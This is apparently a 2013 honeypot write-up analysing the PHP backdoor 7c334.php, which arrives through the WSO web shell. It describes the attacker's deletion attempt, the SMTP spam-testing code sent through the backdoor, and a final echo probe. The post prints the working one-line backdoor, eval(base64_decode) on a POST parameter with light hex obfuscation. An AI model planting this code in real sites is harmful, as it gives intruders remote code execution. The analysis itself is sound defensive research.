7c334.php: World's Simplest Backdoor

Another WSO download, 7c334.php consists entirely of the following:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}
?>

This is only slightly obfuscated: inside a PHP double-quoted string, \x65 is "e" and \x64 is "d", so both parameter names are simply "code". Its advantage is that it never leaves a copy of the malicious PHP on disk; the payload arrives base64-encoded in the request body and is executed from memory by eval(base64_decode(...)). Note that it only works with HTTP POST requests, and further, only with requests that carry a parameter named code. Any other request falls through the if() and produces no output at all.

91.197.19.103 uploaded the backdoor code 6 times between 2013-07-03T04:40:15-06 and 2013-07-03T04:49:38-06. On 2013-07-16T13:57:04-06, 91.197.19.103 tried to delete the backdoor code via the "Php" action of WSO. The PHP deletion code arrives in an HTTP POST request, and WSO executes it via the eval() construct. The code is thorough: it starts at "/" and works its way down the filesystem until it finds 7c334.php and unlinks it. The code is specific to Linux, but that may not mean anything. WSO tells you what operating system it's running on, so you could send a Linux-specific version to Linux systems, and a Windows-specific version to Windows. If the deletion code executes successfully, it prints the phrase "eval_ok". I did not emulate the "Php" action in WSO, so this chunk of code just got saved, and did not return "eval_ok". It does seem that not leaving a trace on disk is a priority to the people installing and using this backdoor.

Eight different IP addresses (none of them the IP address that uploaded the backdoor) tried to execute 3 distinct pieces of PHP via this backdoor.

SMTP Tester 1

Someone attempted to use the backdoor to run an SMTP test. They sent an HTTP POST that got the 7c334 PHP code to eval an SMTP spamming program. The spamming program would try to send an email with the body text Validation success:#43d42cd13ec809071976366def5b135c# to 30 different email addresses, mostly in the UK. The eval'ed code is clearly a spamming tool, as it allows for multiple destination addresses for the message body, fakes a source address, and picks a random string as a fake mail user agent name. In this case, it was used for reconnaissance: the distinctive body text lets the sender check, at mailboxes they control, which compromised hosts can actually deliver mail.

The POST requests for 7c334.php that contain the SMTP tester code also contain name/value pairs used by the tester code when it executes. The name/value pairs include the "from" email address, a list of "to" email addresses, a message body, and a subject line. All of the values are base64-encoded, but the names ("theme", "message", "from", "emails", "mailers") are not. The name/value pairs also include a "verbose" name and corresponding value, which is never used. Several functions (text_macros(), alter_macros(), xnum_macros()) appear, but are never called. All this lends a slapdash feel to the code, as if someone created it by stripping down a larger program, but didn't quite finish the job.

SMTP Tester 2

The eval'ed code for this SMTP tester is mostly the open source PHPMailer class. It looks like a concatenation of class.smtp.php, class.html2text.inc and class.phpmailer.php from the source code of that project, with all comments stripped. Various $Version variables place it at version 5.2.6 of PHPMailer.

PHPMailer is overkill for what this tester does: contact smtp.gmail.com and try the SMTP "EHLO" and "HELO" commands. Only a very few PHPMailer member functions get called. On the other hand, the tester code does try TCP ports 25, 465 and 587 in turn, keeping up the grand tradition of malware trying every difficult operation multiple times.

Just give me some output, any output!

echo "sadfasdfasdfasdf";

The "echo" code was the last thing anyone tried to execute on my honey pot via 7c334.php. It may constitute a manual attempt at figuring out what was going wrong, since my 7c334 emulation didn't actually eval any PHP sent its way.

Author

Bruce Ediger, October, 2013.

PHP Code Sent to 7c334.php

SMTP Tester 1.

SMTP Tester 2.

Emulation Code

Fake SMTP Tester 1

Related PHP Code

Code to delete 7c334.php